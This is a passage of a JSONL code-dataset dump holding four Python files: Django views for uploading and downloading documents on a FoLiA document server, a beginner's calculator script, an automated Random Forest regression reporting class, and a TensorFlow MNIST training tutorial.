try:\n flat.comm.get(request, \"makenamespace/\" + request.user.username, False)\n except urllib2.URLError:\n return HttpResponseForbidden(\"Unable to connect to the document server\")\n\n namespaces_sorted = sorted([x for x in namespaces['namespaces'] if x != request.user.username])\n namespaces_sorted = [request.user.username] + namespaces_sorted\n for namespace in namespaces_sorted:\n if flat.users.models.hasreadpermission(request.user.username, namespace):\n try:\n r = flat.comm.get(request, '/getdocuments/' + namespace, False)\n except urllib2.URLError:\n return HttpResponseForbidden(\"Unable to connect to the document server\")\n docs[namespace] = []\n for d in sorted(r['documents']):\n docid = os.path.basename(d.replace('.folia.xml',''))\n docs[namespace].append( (docid, round(r['filesize'][d] / 1024 / 1024,2) , datetime.datetime.fromtimestamp(r['timestamp'][d]).strftime(\"%Y-%m-%d %H:%M\") ) )\n\n if not 'configuration' in request.session:\n return logout(request)\n\n sorteddocs = [ 
(k, docs[k]) for k in namespaces_sorted if k in docs ]\n\n return render(request, 'index.html', {'docs': sorteddocs, 'defaultmode': settings.DEFAULTMODE,'loggedin': request.user.is_authenticated(), 'username': request.user.username, 'configuration': settings.CONFIGURATIONS[request.session['configuration']], 'version': settings.VERSION, 'namespaces': namespaces_sorted})\n\n@login_required\ndef download(request, namespace, docid):\n data = flat.comm.get(request, '/getdocxml/' +namespace + '/' + docid + '/',False)\n return HttpResponse(data, mimetype='text/xml')\n\n\n@login_required\ndef upload(request):\n if request.method == 'POST':\n namespace = request.POST['namespace'].replace('/','').replace('..','.')\n if flat.users.models.haswritepermission(request.user.username, namespace) and 'file' in request.FILES:\n data = unicode(request.FILES['file'].read(),'utf-8')\n try:\n response = flat.comm.postxml(request,\"upload/\" + namespace , data)\n except urllib2.URLError:\n return HttpResponseForbidden(\"Unable to connect to the document server\")\n if 'error' in response and response['error']:\n return HttpResponseForbidden(response['error'])\n else:\n docid = response['docid']\n return HttpResponseRedirect(\"/\" + settings.DEFAULTMODE + \"/\" + namespace + \"/\" + docid )\n else:\n return HttpResponseForbidden(\"Permission denied\")\n else:\n return HttpResponseForbidden(\"Permission denied\")\n\n","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"204215414","text":"import math\n\ntry:\n userinput = eval(input(\"Please enter a number: \"))\n print(\"0. Quit\\n1. Square\\n2. Square root\\n3. Sin\\n4. Factorial\")\n choice = eval(input(\"\\nPlease enter a choice 1-4: \"))\n\n if choice >=1 and choice <=4:\n \n if choice == 1:\n output = userinput**2\n elif choice == 2:\n output = math.sqrt(userinput)\n elif choice == 3:\n output = math.sin(userinput)\n else:\n output = math.factorial(userinput)\n\n print(output)\n\n elif choice == 0:\n print(\"\\nSee ya later!\")\n \n else:\n print(\"Your input was not valid\")\n\nexcept TypeError:\n print(\"Your input was not a number\")\n\nexcept SyntaxError:\n print(\"Your input was not in the right form.\")\n\nexcept NameError:\n print(\"You didnt enter a number!\")\n\nexcept:\n print(\"Something went wrong!\")\n","sub_path":"quadratics.py","file_name":"quadratics.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"243977676","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Aug 12 13:13:34 2019\r\n\r\n@author: Salim\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.metrics import r2_score\r\nfrom sklearn.metrics import mean_squared_error\r\nfrom sklearn.tree import export_graphviz\r\nimport warnings\r\nfrom subprocess import call\r\nimport openpyxl\r\nfrom openpyxl import Workbook\r\nimport operator\r\nfrom datetime import datetime\r\nfrom sklearn.externals import joblib\r\nimport os\r\n\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\nclass Random_Forest_Regressor():\r\n \"\"\"\r\nAn automated Random Forest Regressor.\r\nParameters\r\n----------\r\ndev_data : dataframe, optional (default=None)\r\n Specify the name of your Development dataset \r\n (as assigned to the dataframe of the .csv file).\r\n\r\noos_data : dataframe, optional (default=None)\r\n Specify the name of your Out of Sample dataset \r\n (as assigned to the dataframe of the .csv file).\r\n \r\noot_data : dataframe, optional (default=None)\r\n Specify the name of your Out of Time dataset \r\n (as assigned to the dataframe of the .csv file).\r\n \r\npdv_data : dataframe, optional (default=None)\r\n Specify the name of your Pre Deployment dataset \r\n (as assigned to the dataframe of the .csv file).\r\n \r\npsi_data : dataframe, optional (default=None)\r\n Specify the name of your Population Stability Index dataset \r\n (as assigned to the dataframe of the .csv file).\r\n The PSI data would not have the target variable column,\r\n as the values for it are to be predicted.\r\n\r\ndependent : string, optional (default=\"None\")\r\n The name of the target variable whose values are to be predicted. \r\n True values for this variable are present in all datasets except the PSI data.\r\n Values for this variable are predicted and compared to create necessary \r\n metrics and also to analyse the performance of the PSI data.\r\n\r\nsplit_flag : bool, optional (default=False)\r\n Whether you want to split your Development data into Development and \r\n OOS data. If True it splits the data into development and OOS\r\n using stratified sampling. If False, it uses the entire development \r\n data without splitting.\r\n \r\nsplit_fraction : float, optional (default=0.0)\r\n The fraction of split of the OOS data. It's value is passed\r\n only if the norm_flag is set to be True.\r\n\r\nhyperopt_flag : bool, optional (default=False)\r\n Whether you want to tune your hyperparameters. If True,\r\n it uses Grid Search CV to find\r\n the best parameters. If False it uses the default parameters. \r\n\r\nlocation : string, optional (default=\"None\")\r\n The path of the folder where you want your results to be saved.\r\n \r\nproject_name : string, optional (default=\"None\")\r\n The name of the project by which you want your results to be saved.\r\n\r\ncols_list : list, optional (default=\"None\")\r\n List of names of columns for which you want the Random Forest\r\n module to be built upon. This column list also contains\r\n the name of the dependent variable.\r\n\r\n\r\n\r\nMethods\r\n----------\r\n__init__ : Initializes all the variables when an \r\n object of the class is called. 
It has all the above \r\n mentioned parameters along with their default values.\r\n\r\nclear_columns : Creates a dataframe for only those columns \r\n which are specified in the parameter 'cols_list'. All other variables\r\n are not considered while executing the code. It does this for all the datasets.\r\n \r\nsplit_train_test : Splits the 'dev_data' into 'train_data' and 'oos_data',\r\n if the 'split_flag' is True. It determines the size of the oos_data by the\r\n value of 'split_fraction'. The splitting is done by using stratified sampling.\r\n\r\nsplit_X_Y : Splits the dataframe into X and Y. Y is the dataframe containing the\r\n target variable and X is the dataframe containing all other variables. This function\r\n is used by the function 'split_train_test', before it splits the data.\r\n\r\ncombine_X_Y : Combines the previously created dataframes (X and Y) into a single\r\n dataframe, after splitting has been performed.\r\n\r\nprocess_data : Combines all the dataframes and does some preprocessing of the categorical\r\n variables. It converts all the categorical columns into uppercase and strips all the blank\r\n spaces, if there are any. It then encodes all categorical variables by using the\r\n function 'convert_categorical'. After the conversion is done, the datasets are separated \r\n again. The datasets are combined before encoding because, if a test dataset had more or \r\n fewer categories than the train data and they were encoded separately, the code would give an error. \r\n\r\nconvert_categorical : Creates dummies for all categorical variables for the entered\r\n dataframe. It creates n-1 dummy columns for a column which has n categories and\r\n returns the new dataframe.\r\n\r\nRandom_Forest_Train : Fits the Random Forest Regressor model on the training data\r\n and returns the trained model.\r\n\r\nhyperopt : Tunes the hyperparameters and chooses the best parameters from the default\r\n pool of values. If True, it uses Grid Search CV to find the \r\n best parameters and returns the model fitted with the best parameters. If False, \r\n it uses the default parameters and returns the original model.\r\n \r\nreg_metrics : Scores the dataset and calculates R square, Adjusted R square, \r\n Mean Squared Error and Root Mean Squared Error for it. It returns a table created\r\n out of the values of the above mentioned metrics. \r\n\r\npsi_calculation : Scores the training data using the model and creates bands of 20 \r\n percentiles each. It then scores the PSI data and gives the median of values in each\r\n bin, after classifying them as per the percentile bins created by the dependent \r\n column of the training data. It returns a table created out of the median values of \r\n the training and the psi data.\r\n\r\nsave_files : Calls all other functions. It calculates the univariate distribution\r\n for each dataset, feature importance for each variable (and sorts them in descending order),\r\n and the correlation coefficient among all independent variables. It saves all of the \r\n above mentioned results in an excel file along with the order of variables which \r\n would be used to score new data in the future (ORDER SHOULD NOT BE CHANGED).\r\n These things are saved at the location provided by the user with the\r\n project name (also provided by the user), without any human intervention. 
Along \r\n with this, it also saves the Performance tables for all datasets in the same excel file.\r\n It also saves the PSI table and the PSI Performance Graph (in the excel file \r\n and as a separate .png file) and the trained model in serialized form for future use\r\n (as a separate .joblib.dat file) in the same location without any human intervention.\r\n All the files in the provided location are saved such that the file names \r\n are followed by the time of the system at which the program is executed. This is \r\n done to avoid overwriting of the files when the program is executed multiple times. \r\n\r\n \"\"\"\r\n def __init__(self,dev_data=None,oos_data=None,oot_data=None,pdv_data=None,psi_data=None,dependent=None,split_flag=False,split_fraction=0,cols_list=None,hyperopt_flag=False,location=None,project_name=None):\r\n self.dev_data=dev_data\r\n self.oos_data=oos_data\r\n self.oot_data=oot_data\r\n self.pdv_data=pdv_data\r\n self.psi_data=psi_data\r\n self.dependent=dependent\r\n self.split_flag=split_flag\r\n self.split_fraction=split_fraction\r\n self.cols_list=cols_list\r\n self.hyperopt_flag=hyperopt_flag\r\n self.location=location\r\n self.project_name=project_name\r\n \r\n def clear_columns(self):\r\n self.dev_data=self.dev_data[self.cols_list]\r\n if self.oos_data is not None:\r\n self.oos_data=self.oos_data[self.cols_list]\r\n self.oot_data=self.oot_data[self.cols_list]\r\n self.pdv_data=self.pdv_data[self.cols_list]\r\n self.cols_list.remove(self.dependent)\r\n self.psi_data=self.psi_data[self.cols_list]\r\n \r\n def split_train_test(self):\r\n self.clear_columns()\r\n if self.split_flag==True:\r\n data1,data2=self.split_X_Y(self.dev_data)\r\n df2X,df3X,df2Y,df3Y = train_test_split(data1,data2,test_size=self.split_fraction, random_state=42)\r\n self.train_data=self.combine_X_Y(df2X,df2Y)\r\n self.train_data.reset_index(inplace=True)\r\n self.oos_data=self.combine_X_Y(df3X,df3Y)\r\n self.oos_data.reset_index(inplace=True)\r\n self.copy_train=self.train_data\r\n self.copy_oos=self.oos_data\r\n self.copy_oot=self.oot_data\r\n self.copy_pdv=self.pdv_data\r\n self.copy_psi=self.psi_data\r\n \r\n elif self.split_flag==False:\r\n self.train_data=self.dev_data\r\n self.oos_data=self.oos_data\r\n self.copy_train=self.train_data\r\n self.copy_oos=self.oos_data\r\n self.copy_oot=self.oot_data\r\n self.copy_pdv=self.pdv_data\r\n self.copy_psi=self.psi_data\r\n \r\n def split_X_Y(self,df):\r\n X=df.drop([self.dependent],axis=1)\r\n Y=pd.DataFrame(df,columns=[self.dependent])\r\n return X,Y\r\n\r\n def combine_X_Y(self,df1,df2):\r\n df3=pd.concat([df1,pd.DataFrame(df2,columns=[self.dependent])],axis=1)\r\n return df3\r\n \r\n def process_data(self):\r\n if self.oos_data is not None:\r\n \r\n self.train_data.loc[self.train_data[self.dependent]==0, self.dependent] = 0.001\r\n self.Y_train=pd.DataFrame(np.log(self.train_data[self.dependent]),columns=[self.dependent])\r\n self.oos_data.loc[self.oos_data[self.dependent]==0, self.dependent] = 0.001\r\n self.oos_Y=pd.DataFrame(np.log(self.oos_data[self.dependent]),columns=[self.dependent])\r\n self.oot_data.loc[self.oot_data[self.dependent]==0, self.dependent] = 0.001\r\n self.oot_Y=pd.DataFrame(np.log(self.oot_data[self.dependent]),columns=[self.dependent])\r\n self.pdv_data.loc[self.pdv_data[self.dependent]==0, self.dependent] = 0.001\r\n self.pdv_Y=pd.DataFrame(np.log(self.pdv_data[self.dependent]),columns=[self.dependent])\r\n \r\n self.train_data['dummy']=0\r\n self.oos_data['dummy']=1\r\n self.oot_data['dummy']=2\r\n 
self.pdv_data['dummy']=3\r\n self.psi_data['dummy']=4\r\n\r\n combine=pd.concat([self.train_data[self.cols_list+['dummy']],self.oos_data[self.cols_list+['dummy']],self.oot_data[self.cols_list+['dummy']],self.pdv_data[self.cols_list+['dummy']],self.psi_data[self.cols_list+['dummy']]])\r\n \r\n# combine[combine.select_dtypes(include=np.number).columns] = combine[combine.select_dtypes(include=np.number).columns].fillna(value=99999999)\r\n combine[combine.select_dtypes(exclude=np.number).columns] = combine[combine.select_dtypes(exclude=np.number).columns].fillna(value=\"MISSING\")\r\n combine.loc[:,combine.dtypes=='O']=combine.loc[:,combine.dtypes=='O'].apply(lambda x: x.astype(str).str.upper()) \r\n combine.loc[:,combine.dtypes=='O']=combine.loc[:,combine.dtypes=='O'].apply(lambda x: x.astype(str).str.strip()) \r\n \r\n ohe=self.convert_categorical(combine)\r\n \r\n self.train_data=ohe[ohe['dummy']==0]\r\n self.oos_data=ohe[ohe['dummy']==1]\r\n self.oot_data=ohe[ohe['dummy']==2]\r\n self.pdv_data=ohe[ohe['dummy']==3]\r\n self.psi_data=ohe[ohe['dummy']==4]\r\n \r\n self.train_data.drop(['dummy'],axis=1,inplace=True)\r\n self.oos_data.drop(['dummy'],axis=1,inplace=True)\r\n self.oot_data.drop(['dummy'],axis=1,inplace=True)\r\n self.pdv_data.drop(['dummy'],axis=1,inplace=True)\r\n self.psi_data.drop(['dummy'],axis=1,inplace=True)\r\n \r\n else:\r\n \r\n self.train_data.loc[self.train_data[self.dependent]==0, self.dependent] = 0.001\r\n self.Y_train=pd.DataFrame(np.log(self.train_data[self.dependent]),columns=[self.dependent])\r\n self.oot_data.loc[self.oot_data[self.dependent]==0, self.dependent] = 0.001\r\n self.oot_Y=pd.DataFrame(np.log(self.oot_data[self.dependent]),columns=[self.dependent])\r\n self.pdv_data.loc[self.pdv_data[self.dependent]==0, self.dependent] = 0.001\r\n self.pdv_Y=pd.DataFrame(np.log(self.pdv_data[self.dependent]),columns=[self.dependent])\r\n \r\n self.train_data['dummy']=0\r\n self.oot_data['dummy']=1\r\n self.pdv_data['dummy']=2\r\n self.psi_data['dummy']=3\r\n \r\n combine=pd.concat([self.train_data[self.cols_list+['dummy']],self.oot_data[self.cols_list+['dummy']],self.pdv_data[self.cols_list+['dummy']],self.psi_data[self.cols_list+['dummy']]])\r\n \r\n# combine[combine.select_dtypes(include=np.number).columns] = combine[combine.select_dtypes(include=np.number).columns].fillna(value=99999999)\r\n combine[combine.select_dtypes(exclude=np.number).columns] = combine[combine.select_dtypes(exclude=np.number).columns].fillna(value=\"MISSING\")\r\n combine.loc[:,combine.dtypes=='O']=combine.loc[:,combine.dtypes=='O'].apply(lambda x: x.astype(str).str.upper()) \r\n combine.loc[:,combine.dtypes=='O']=combine.loc[:,combine.dtypes=='O'].apply(lambda x: x.astype(str).str.strip()) \r\n \r\n ohe=self.convert_categorical(combine)\r\n \r\n self.train_data=ohe[ohe['dummy']==0]\r\n self.oot_data=ohe[ohe['dummy']==1]\r\n self.pdv_data=ohe[ohe['dummy']==2]\r\n self.psi_data=ohe[ohe['dummy']==3]\r\n \r\n self.train_data.drop(['dummy'],axis=1,inplace=True)\r\n self.oot_data.drop(['dummy'],axis=1,inplace=True)\r\n self.pdv_data.drop(['dummy'],axis=1,inplace=True)\r\n self.psi_data.drop(['dummy'],axis=1,inplace=True)\r\n \r\n def convert_categorical(self, df):\r\n ohe_df=pd.get_dummies(df,columns=df.select_dtypes(exclude=np.number).columns,drop_first=True)\r\n return ohe_df\r\n\r\n def Random_Forest_Train(self):\r\n self.forest=RandomForestRegressor(n_jobs=1)\r\n self.forest.fit(self.train_data,self.Y_train)\r\n return self.forest\r\n \r\n def hyperopt(self):\r\n if 
self.hyperopt_flag==True:\r\n param_grid = {'max_depth': [3,5,7,9],'n_estimators': [50,200,400,600]}\r\n self.forest_cv=GridSearchCV(self.forest, param_grid)\r\n self.forest_cv.fit(self.train_data, self.Y_train)\r\n print(self.forest_cv.best_params_)\r\n self.best_grid = self.forest_cv.best_estimator_\r\n return self.best_grid\r\n elif self.hyperopt_flag==False: \r\n return self.forest\r\n \r\n def reg_metrics(self,X_test,Y_test):\r\n truth=np.exp(Y_test)\r\n pred=self.model.predict(X_test)\r\n Y_pred=np.exp(pred)\r\n metrics=['R squared','Adjusted R squared','Mean Square Error','RMSE']\r\n score=pd.DataFrame(metrics,columns=['Metrics'])\r\n r_squared=r2_score(truth,Y_pred)\r\n adjusted_r_squared=1 - (1-r_squared)*(len(Y_test)-1)/(len(Y_test)-X_test.shape[1]-1)\r\n mse=mean_squared_error(truth,Y_pred)\r\n rmse=np.sqrt(mse)\r\n values=[r_squared,adjusted_r_squared,mse,rmse]\r\n score['Values']=values\r\n return score\r\n \r\n def psi_calculation(self):\r\n score=np.exp(self.Y_train)\r\n score.columns=['Expected']\r\n values=[score.Expected.min(),score.Expected.quantile(0.2),score.Expected.quantile(0.4),score.Expected.quantile(0.6),score.Expected.quantile(0.8),score.Expected.max()]\r\n score['Bands'] = 1\r\n score.loc[((score['Expected']>=values[0])&(score['Expected']<values[1])),'Bands']=1\r\n score.loc[((score['Expected']>=values[1])&(score['Expected']<values[2])),'Bands']=2\r\n score.loc[((score['Expected']>=values[2])&(score['Expected']<values[3])),'Bands']=3\r\n score.loc[((score['Expected']>=values[3])&(score['Expected']<values[4])),'Bands']=4\r\n score.loc[((score['Expected']>=values[4])&(score['Expected']<=values[5])),'Bands']=5\r\n actual=pd.DataFrame(np.exp(self.model.predict(self.psi_data)),columns=['Actual'])\r\n actual['Bands'] = 1\r\n actual.loc[((actual['Actual']>=values[0])&(actual['Actual']<values[1])),'Bands']=1\r\n actual.loc[((actual['Actual']>=values[1])&(actual['Actual']<values[2])),'Bands']=2\r\n actual.loc[((actual['Actual']>=values[2])&(actual['Actual']<values[3])),'Bands']=3\r\n actual.loc[((actual['Actual']>=values[3])&(actual['Actual']<values[4])),'Bands']=4\r\n actual.loc[((actual['Actual']>=values[4])&(actual['Actual']<=values[5])),'Bands']=5\r\n score=pd.concat([score.groupby('Bands')['Expected'].median().reset_index(drop=True),actual.groupby('Bands')['Actual'].median().reset_index(drop=True)],axis=1)\r\n score['Bands']=\"\"\r\n score.loc[0,'Bands']=\">= \"+np.round(values[0],3).astype(\"str\") +\" AND < \"+np.round(values[1],3).astype(\"str\")\r\n score.loc[1,'Bands']=\">= \"+np.round(values[1],3).astype(\"str\") +\" AND < \"+np.round(values[2],3).astype(\"str\")\r\n score.loc[2,'Bands']=\">= \"+np.round(values[2],3).astype(\"str\") +\" AND < \"+np.round(values[3],3).astype(\"str\")\r\n score.loc[3,'Bands']=\">= \"+np.round(values[3],3).astype(\"str\") +\" AND < \"+np.round(values[4],3).astype(\"str\")\r\n score.loc[4,'Bands']=\">= \"+np.round(values[4],3).astype(\"str\") +\" AND < \"+np.round(values[5],3).astype(\"str\")\r\n return score\r\n \r\n \r\n def save_files(self): \r\n self.split_train_test()\r\n self.process_data()\r\n self.forest=self.Random_Forest_Train()\r\n self.model=self.hyperopt()\r\n self.table_train=self.reg_metrics(self.train_data,self.Y_train)\r\n if self.oos_data is not None:\r\n self.table_oos=self.reg_metrics(self.oos_data,self.oos_Y)\r\n else:\r\n self.table_oos=None\r\n self.table_oot=self.reg_metrics(self.oot_data,self.oot_Y)\r\n self.table_pdv=self.reg_metrics(self.pdv_data,self.pdv_Y)\r\n self.table_psi=self.psi_calculation()\r\n time=datetime.now()\r\n book=Workbook() \r\n path=os.path.join(self.location,\"Performance_\"+str(self.project_name)+\"_\"+time.strftime(\"%d-%m-%Y %H-%M-%S\")+\".xlsx\")\r\n writer = pd.ExcelWriter(path, engine='openpyxl')\r\n writer.book=book\r\n self.table_train.to_excel(writer,sheet_name=\"Development Performance\")\r\n pd.concat([self.copy_train.describe(percentiles=[0.005,0.01,0.025,0.05,0.1,0.2,0.25,0.3,0.4,0.5,0.6,0.7,0.75,0.8,0.9,0.975,0.99]).T,pd.DataFrame(self.copy_train.isnull().sum(),columns=['Missing Values'])],axis=1).to_excel(writer,sheet_name=\"Development Variables Distribution\")\r\n if self.table_oos is not None:\r\n self.table_oos.to_excel(writer,sheet_name=\"OOS Performance\")\r\n 
pd.concat([self.copy_oos.describe(percentiles=[0.005,0.01,0.025,0.05,0.1,0.2,0.25,0.3,0.4,0.5,0.6,0.7,0.75,0.8,0.9,0.975,0.99]).T,pd.DataFrame(self.copy_oos.isnull().sum(),columns=['Missing Values'])],axis=1).to_excel(writer,sheet_name=\"OOS Variables Distribution\")\r\n self.table_oot.to_excel(writer,sheet_name=\"OOT Performance\")\r\n pd.concat([self.copy_oot.describe(percentiles=[0.005,0.01,0.025,0.05,0.1,0.2,0.25,0.3,0.4,0.5,0.6,0.7,0.75,0.8,0.9,0.975,0.99]).T,pd.DataFrame(self.copy_oot.isnull().sum(),columns=['Missing Values'])],axis=1).to_excel(writer,sheet_name=\"OOT Variables Distribution\")\r\n self.table_pdv.to_excel(writer,sheet_name=\"PDV Performance\")\r\n pd.concat([self.copy_pdv.describe(percentiles=[0.005,0.01,0.025,0.05,0.1,0.2,0.25,0.3,0.4,0.5,0.6,0.7,0.75,0.8,0.9,0.975,0.99]).T,pd.DataFrame(self.copy_pdv.isnull().sum(),columns=['Missing Values'])],axis=1).to_excel(writer,sheet_name=\"PDV Variables Distribution\")\r\n self.table_psi.to_excel(writer,sheet_name=\"PSI Performance\")\r\n pd.concat([self.copy_psi.describe(percentiles=[0.005,0.01,0.025,0.05,0.1,0.2,0.25,0.3,0.4,0.5,0.6,0.7,0.75,0.8,0.9,0.975,0.99]).T,pd.DataFrame(self.copy_psi.isnull().sum(),columns=['Missing Values'])],axis=1).to_excel(writer,sheet_name=\"PSI Variables Distribution\")\r\n fi=list(zip(self.train_data.columns,self.model.feature_importances_))\r\n fi.sort(key=operator.itemgetter(1),reverse=True)\r\n pd.DataFrame(fi,columns=['Variables','Feature Importance']).to_excel(writer,sheet_name=\"Feature Importances\",index=False)\r\n self.train_data.corr().to_excel(writer,sheet_name=\"Correlation Matrix\") \r\n ax = plt.gca() \r\n plt.title(\"PSI Performance\", fontsize=14)\r\n plt.ylabel('Median Values',fontsize=12)\r\n plt.xlabel('Bands',fontsize=12)\r\n self.table_psi.plot(kind='line',x='Bands',y='Expected',ax=ax,color='green')\r\n self.table_psi.plot(kind='line',x='Bands',y='Actual', ax=ax,color='red')\r\n plt.setp(ax.get_xticklabels(), rotation=30, horizontalalignment='right')\r\n book.remove(book['Sheet'])\r\n writer.save()\r\n writer.close()\r\n wb=openpyxl.load_workbook(path)\r\n ws=wb.create_sheet(\"PSI Graph\")\r\n plt.savefig(os.path.join(self.location,\"psi_graph\"+time.strftime(\"%d-%m-%Y %H-%M-%S\")+\".png\"),dpi=150)\r\n img=openpyxl.drawing.image.Image(os.path.join(self.location,\"psi_graph\"+time.strftime(\"%d-%m-%Y %H-%M-%S\")+\".png\"))\r\n ws.add_image(img)\r\n wb.save(path)\r\n wb.close() \r\n# wb=openpyxl.load_workbook(path)\r\n# export_graphviz(self.model, out_file='tree.dot',rounded = True,feature_names = self.train_data.columns, proportion = False,precision = 2, filled = True)\r\n# call(['dot', '-Tpng', 'tree.dot', '-o', 'tree.png', '-Gdpi=600'])\r\n# ws=wb.create_sheet(\"Train Tree\")\r\n# plt.figure(figsize = (14, 18))\r\n# plt.imshow(plt.imread('tree.png'))\r\n# plt.axis('off')\r\n# plt.savefig(os.path.join(self.location,\"Train_Tree\"+time.strftime(\"%d-%m-%Y %H-%M-%S\")+\".png\"),dpi=600)\r\n# img=openpyxl.drawing.image.Image(os.path.join(self.location,\"Train_Tree\"+time.strftime(\"%d-%m-%Y %H-%M-%S\")+\".png\"))\r\n# ws.add_image(img)\r\n# wb.save(path)\r\n# wb.close()\r\n joblib.dump(self.model,os.path.join(self.location,self.project_name+\"-\"+time.strftime(\"%d-%m-%Y %H-%M-%S\")+\".joblib.dat\"))\r\n del self.copy_train,self.copy_oos,self.copy_oot,self.copy_pdv,self.copy_psi\r\n return 
self.train_data,self.oos_data,self.oot_data,self.pdv_data,self.psi_data,self.table_train,self.table_oos,self.table_oot,self.table_pdv,self.table_psi\r\n\r\ndev_data=pd.read_csv('Regs_dev.csv')\r\noos_data=pd.read_csv('Regs_oot.csv')\r\noot_data=pd.read_csv('Regs_oot.csv')\r\npdv_data=pd.read_csv('Regs_pdv.csv')\r\npsi_data=pd.read_csv('Regs_psi.csv')\r\n \r\ncols_list=[' age', ' job ', ' marital ', ' education', ' default',\r\n ' housing', ' loan', ' contact', ' month', ' day_of_week', ' duration',\r\n ' campaign', ' pdays', ' previous', ' poutcome', ' emp_var_rate',\r\n ' cons_price_idx', ' cons_conf_idx', ' euribor3m', ' nr_employed']\r\nproject_name=\"Random_Forest_Regressor\"\r\nlocation=\"D:\\Project 5\\Random Forest Regressor\"\r\n\r\nmodel1=Random_Forest_Regressor(dev_data=dev_data,oos_data=oos_data,oot_data=oot_data,pdv_data=pdv_data,psi_data=psi_data,dependent=' duration',split_flag=False,hyperopt_flag=False,location=location,project_name=project_name,cols_list=cols_list)\r\ntrain_final,oos_final,oot_final,pdv_final,psi_final,dev_ks_table,ks_table_oos,ks_table_oot,ks_table_pdv,psi_table=model1.save_files()","sub_path":"Regression/Random_Forest_Regressor.py","file_name":"Random_Forest_Regressor.py","file_ext":"py","file_size_in_byte":24011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
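Since save_files() serializes the fitted model with joblib, a natural follow-up is reloading it to score new data. A minimal sketch (the file name below is illustrative; save_files() appends the run timestamp, and the scoring frame must keep the exact dummy-encoded column order, as the class docstring warns):

from sklearn.externals import joblib
import numpy as np

loaded_model = joblib.load("Random_Forest_Regressor-12-08-2019 13-13-34.joblib.dat")  # hypothetical file name
# train_final is already encoded in the training column order; predictions come
# back on the log scale, so exponentiate to return to the original units
predictions = np.exp(loaded_model.predict(train_final))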
+{"seq_id":"526254877","text":"import tensorflow as tf\n\nfrom tensorflow.keras.layers import Dense, Flatten, Conv2D\nfrom tensorflow.keras import Model\n\n'''\nSubclassing API 提供了由运行定义的高级研究接口。为您的模型创建一个类,然后以命令方式编写前向传播。\n您可以轻松编写自定义层、激活函数和训练循环。\n'''\n\nmnist = tf.keras.datasets.mnist\n\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\nx_train, x_test = x_train / 255.0, x_test / 255.0\n\nprint(x_train.shape)\n# 增加一个维度\nx_train = x_train[..., tf.newaxis] # 也可以np.expand_dims(X_train,axis = -1)\nx_test = x_test[..., tf.newaxis]\n\nprint(x_train.shape)\n\n# 使用tf.data将数据集打乱以及获取成批量数据\ntrain_ds = tf.data.Dataset.from_tensor_slices(\n (x_train, y_train)).shuffle(10000).batch(32)\n\ntest_ds = tf.data.Dataset.from_tensor_slices((x_test, y_test)).batch(32)\n\n\nclass MyModel(Model):\n def __init__(self):\n super().__init__()\n # 或者写成 super(MyModel,self).__init__() python2.7的写法\n self.conv1 = Conv2D(32, 3, activation='relu')\n self.flatten = Flatten()\n self.d1 = Dense(128, activation='relu') # 或者 units = 128, activation = tf.nn.relu\n self.d2 = Dense(10, activation='softmax')\n\n def call(self, x):\n x = self.conv1(x)\n x = self.flatten(x)\n x = self.d1(x)\n return self.d2(x)\n\n\n# 创建模型的实例\nmodel = MyModel()\n\n# 为训练选择优化器与损失函数:\nloss_object = tf.losses.SparseCategoricalCrossentropy()\n\noptimizer = tf.optimizers.Adam()\n\"\"\"\n tf.losses.SparseCategoricalCrossentropy与tf.losses.sparse_categorical_crossentropy的区别:\n tf.losses.sparse_categorical_crossentropy(y_true=y,y_pred=y_pred)是得到一个batch内每一个样本的loss\n 如batch_size=50时,得到的结果是shape=(50,)的Tensor\n 而tf.losses.SparseCategoricalCrossentropy()(y_true=y,y_pred=y_pred)得到的是reduce_mean之后的结果 \n 此时,结果shape=(),为一个标量,是50个loss值求平均的结果\n\"\"\"\n\n# 选择衡量指标来度量模型的损失值(loss)和准确率(accuracy)。这些指标在epoch上累积值,然后打印出整体结果。\ntrain_loss = tf.metrics.Mean(name='train_loss')\ntrain_accuracy = tf.metrics.SparseCategoricalAccuracy(name='train_accuracy')\n\ntest_loss = tf.metrics.Mean(name='test_loss')\ntest_accuracy = tf.metrics.SparseCategoricalAccuracy(name='test_accuracy')\n\n\n# 使用tf.GradientTape训练模型\n@tf.function\ndef train_step(images, labels):\n with tf.GradientTape() as tape:\n predictions = model(images)\n loss = loss_object(y_true=labels, y_pred=predictions)\n gradients = tape.gradient(loss, model.trainable_variables)\n optimizer.apply_gradients(zip(gradients, model.trainable_variables))\n\n train_loss(loss)\n train_accuracy(labels, predictions)\n\n\n# 测试模型\n@tf.function\ndef test_step(images, labels):\n predictions = model(images)\n t_loss = loss_object(y_true=labels, y_pred=predictions)\n test_loss(t_loss)\n test_accuracy(labels, predictions)\n\n\nEPOCHS = 5\n\nfor epoch in range(EPOCHS):\n train_loss.reset_states()\n train_accuracy.reset_states()\n test_loss.reset_states()\n test_accuracy.reset_states()\n\n for images, labels in train_ds:\n train_step(images, labels)\n\n for test_images, test_labels in test_ds:\n test_step(test_images, test_labels)\n\n template = 'Epoch {}, Loss: {:.2f}, Accuracy: {:.2f}%, Test Loss: {:.2f}, Test Accuracy: {:.2f}%'\n print(template.format(\n epoch + 1,\n train_loss.result(),\n train_accuracy.result() * 100,\n test_loss.result(),\n test_accuracy.result() * 100\n ))\n # 此模型在测试集上的准确率达到了98.53%\n","sub_path":"Official/Overview/expert.py","file_name":"expert.py","file_ext":"py","file_size_in_byte":3789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
